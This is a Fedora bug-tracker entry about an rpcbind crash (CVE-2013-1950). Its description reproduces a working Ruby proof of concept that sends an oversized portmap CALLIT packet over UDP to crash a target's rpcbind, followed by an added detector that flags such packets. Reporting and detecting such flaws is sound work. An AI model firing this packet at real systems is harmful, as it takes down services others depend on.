Bug 985254 - rpcbind exploit made public for 0.2.0-19 - push 0.2.0-20 to fc 17 stable
Status: CLOSED DUPLICATE of bug 955211
Product: Fedora
Classification: Fedora
Component: rpcbind
Version: 17
Hardware: All Linux
Priority: unspecified
Severity: urgent
Assigned To: Steve Dickson
QA Contact: Fedora Extras Quality Assurance
URL: http://packetstormsecurity.com/files/...
Keywords: Security
Reported: 2013-07-17 04:03 EDT by customercare
Modified: 2013-07-17 04:12 EDT (History)
Doc Type: Bug Fix
Last Closed: 2013-07-17 04:12:13 EDT
Type: Bug
Description customercare 2013-07-17 04:03:26 EDT
#!/usr/bin/ruby
#
#   rpcbind_udp_crash_poc.rb
#   07/15/2013
#   Sean Verity <veritysr1980 [at] gmail.com>
#   CVE 2013-1950
#
#   rpcbind (CALLIT Procedure) UDP Crash PoC
#   Affected Software Package: rpcbind-0.2.0-19
#
#   Tested on:
#   Fedora 17 (3.9.8-100.fc17.x86_64 #1 SMP)
#   CentOS 6.3 Final (2.6.32-279.22.1.el6.x86_64 #1 SMP)
#
#   rpcbind can be crashed by setting the argument length
#   value > 8944 in an RPC CALLIT procedure request over UDP.
#
 
require 'socket'
 
def usage
    abort "\nusage: ./rpcbind_udp_crash_poc.rb <target>\n\n"
end
 
if ARGV.length == 1
    pkt = [rand(2**32)].pack('N')   # XID
    pkt << [0].pack('N')          # Message Type: CALL (0)
    pkt << [2].pack('N')          # RPC Version: 2
    pkt << [100000].pack('N')     # Program: Portmap (100000)
    pkt << [2].pack('N')          # Program Version: 2
    pkt << [5].pack('N')          # Procedure: CALLIT (5)
    pkt << [0].pack('N')          # Credentials Flavor: AUTH_NULL (0)
    pkt << [0].pack('N')          # Length: 0
    pkt << [0].pack('N')          # Credentials Verifier: AUTH_NULL (0)
    pkt << [0].pack('N')          # Length: 0
    pkt << [0].pack('N')          # Program: Unknown (0)
    pkt << [1].pack('N')          # Version: 1
    pkt << [1].pack('N')          # Procedure: 1
    pkt << [8945].pack('N')           # Argument Length
    pkt << "crash"                    # Arguments
 
    s = UDPSocket.new
    s.send(pkt, 0, ARGV[0], 111)
else
    usage
end
Comment 1 Tomas Hoger 2013-07-17 04:12:13 EDT

*** This bug has been marked as a duplicate of bug 955211 ***
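
A defender-side check for the request shape described in the PoC header in the description above, as an added example that is not part of the original report: it classifies a captured UDP port 111 payload and flags CALLIT requests whose declared argument length exceeds 8944 or the bytes actually present in the datagram. The function names, the length-mismatch heuristic and the sample payloads are assumptions made for illustration.

```ruby
# Added example (not from the bug report): classify portmap CALLIT requests
# found in captured UDP/111 payloads. No network access is involved.
PORTMAP_PROG = 100_000
PROC_CALLIT  = 5
MAX_ARG_LEN  = 8944   # threshold stated in the PoC header on this page

# Skip one opaque_auth (flavor, length, body padded to 4 bytes).
# Returns the offset after it, or nil if the payload is truncated.
def skip_auth(buf, off)
  return nil if off + 8 > buf.bytesize
  len = buf.byteslice(off + 4, 4).unpack1('N')
  nxt = off + 8 + ((len + 3) & ~3)
  nxt <= buf.bytesize ? nxt : nil
end

# Returns :malformed, :not_callit, :ok or :suspicious for one UDP payload.
def classify_callit(payload)
  buf = payload.b
  return :malformed if buf.bytesize < 24
  _xid, mtype, rpcvers, prog, _vers, procedure = buf.unpack('N6')
  return :not_callit unless [mtype, rpcvers, prog, procedure] ==
                            [0, 2, PORTMAP_PROG, PROC_CALLIT]
  off = 24
  2.times do                                    # credentials, then verifier
    off = skip_auth(buf, off)
    return :malformed if off.nil?
  end
  return :malformed if off + 16 > buf.bytesize  # target prog, vers, proc, arg length
  arg_len   = buf.byteslice(off + 12, 4).unpack1('N')
  remaining = buf.bytesize - (off + 16)
  # Assumed heuristic: a declared length above the page's threshold, or one
  # larger than the bytes actually present, is worth alerting on.
  return :suspicious if arg_len > MAX_ARG_LEN || arg_len > remaining
  :ok
end

# Constructed sample payload (not captured traffic): AUTH_NULL credentials,
# target program 100003, version 3, procedure 0.
def sample_callit(arg_len, args)
  [0x1234, 0, 2, PORTMAP_PROG, 2, PROC_CALLIT,
   0, 0, 0, 0, 100_003, 3, 0, arg_len].pack('N*') + args
end

if __FILE__ == $0
  puts classify_callit(sample_callit(4, 'abcd'))
  puts classify_callit(sample_callit(8945, 'crash'))
end
```
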
